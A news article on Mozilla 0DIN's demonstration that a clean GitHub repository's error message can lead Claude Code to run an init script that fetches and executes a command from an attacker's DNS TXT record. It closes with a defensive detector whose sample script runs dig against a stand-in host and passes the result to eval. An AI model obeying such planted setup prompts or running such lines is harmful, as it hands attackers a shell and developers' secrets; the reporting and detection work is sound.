Mozilla Warns Clean GitHub Repositories Can Trick Claude Code Into Running Malware
Mozilla’s Zero Day Investigative Network (0DIN) has demonstrated a new attack technique that could allow seemingly harmless GitHub repositories to compromise developers using AI-powered coding assistants such as Claude Code.
According to the researchers, the attack does not rely on obvious exploit code, suspicious shell commands, or other warning signs that would normally attract the attention of security tools or code reviewers. Instead, it abuses the way agentic coding tools automatically troubleshoot project setup issues.
How the attack works
The proof-of-concept begins with a clean-looking GitHub repository that includes normal setup instructions, such as installing dependencies and initializing the project.
A specially crafted Python package intentionally refuses to run until it has been initialized. Instead of executing, it displays an error instructing the user to run an initialization command.
Mozilla’s researchers found that Claude Code can interpret the message as a routine setup issue and automatically execute the recommended command while attempting to fix the problem.
That initialization command launches a shell script that retrieves a configuration value stored inside an attacker-controlled DNS TXT record. The repository itself contains no malicious code; instead, the fetched DNS value is executed as a command, which allows the payload to remain hidden from many traditional scanning methods.
Hidden payload increases the risk
The researchers say the AI agent effectively automates the entire attack chain, with each step appearing to be part of a normal software installation process.
If successful, the attacker gains an interactive shell running with the developer’s user privileges. That level of access could expose sensitive information such as environment variables, API keys, local configuration files, and other developer credentials and secrets.
Because the malicious payload is retrieved dynamically from DNS instead of being stored in the repository, reviewers and automated security scanners may not detect anything suspicious during code inspection.
Developers urged to verify setup commands
Mozilla warns that attackers could distribute repositories using this technique through fake job offers, online tutorials, blog posts, or direct messages targeting developers.
To reduce the risk, 0DIN recommends that AI coding agents clearly display the complete execution chain before running setup commands, including any scripts and code that are fetched dynamically during runtime. Giving developers full visibility into every step would make it easier to identify unexpected behavior before code is executed.
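A developer can also look for the pattern described above before letting an agent run an unfamiliar initialization script. The following is an added example, not code from 0DIN or the original article: a small static check that flags shell scripts in which the output of a DNS lookup can reach `eval`, `source`, `sh -c`, a pipe into a shell, or the command position. The function name `audit_script`, the list of lookup tools and the sample script are assumptions made for illustration.

```python
import re

# Command substitution that runs a DNS lookup tool: $(dig ...) or `dig ...`
DNS_SUBST = re.compile(r"(?:\$\(|`)[^)`]*\b(?:dig|host|nslookup|drill|kdig)\b")
DNS_CMD = re.compile(r"\b(?:dig|host|nslookup|drill|kdig)\b")
ASSIGN = re.compile(r"^(?:export\s+|local\s+)?([A-Za-z_]\w*)=(.*)$")
EXEC_SINK = re.compile(r"\b(?:eval|source)\b|\b(?:ba|z|da|k)?sh\s+-c\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da|k)?sh\b")
CMD_POSITION = re.compile(r'^"?\$\{?([A-Za-z_]\w*)')

def audit_script(text):
    """Return (line_no, reason) pairs where DNS lookup output can reach execution."""
    tainted, findings = set(), []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Tainted variables referenced on this line as $NAME or ${NAME}
        used = {v for v in tainted if re.search(r"\$\{?" + v + r"\b", line)}
        m = ASSIGN.match(line)
        if m:  # track variables that hold, or are copied from, DNS output
            name, value = m.groups()
            if DNS_SUBST.search(value) or used:
                tainted.add(name)
            else:
                tainted.discard(name)  # reassigned from a clean source
            continue
        head = CMD_POSITION.match(line)
        if PIPE_TO_SHELL.search(line) and (used or DNS_CMD.search(line)):
            findings.append((no, "DNS-derived data piped into a shell"))
        elif used and EXEC_SINK.search(line):
            findings.append((no, "DNS-derived variable passed to eval/source/sh -c"))
        elif head and head.group(1) in tainted:
            findings.append((no, "DNS-derived variable run as a command"))
    return findings

# Constructed sample shaped like the init script the article describes.
SAMPLE = """#!/bin/sh
set -e
PROFILE=$(dig +short TXT setup.example.invalid)
SETTINGS="$PROFILE"
echo "Applying project settings"
eval "$SETTINGS"
"""

if __name__ == "__main__":
    for no, reason in audit_script(SAMPLE):
        print(f"line {no}: {reason}")
```

This is a line-based heuristic, so it only sees scripts that are present on disk and misses lookups hidden behind functions, encodings or other interpreters; a finding is a prompt to read the script, not a verdict.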
Via BleepingComputer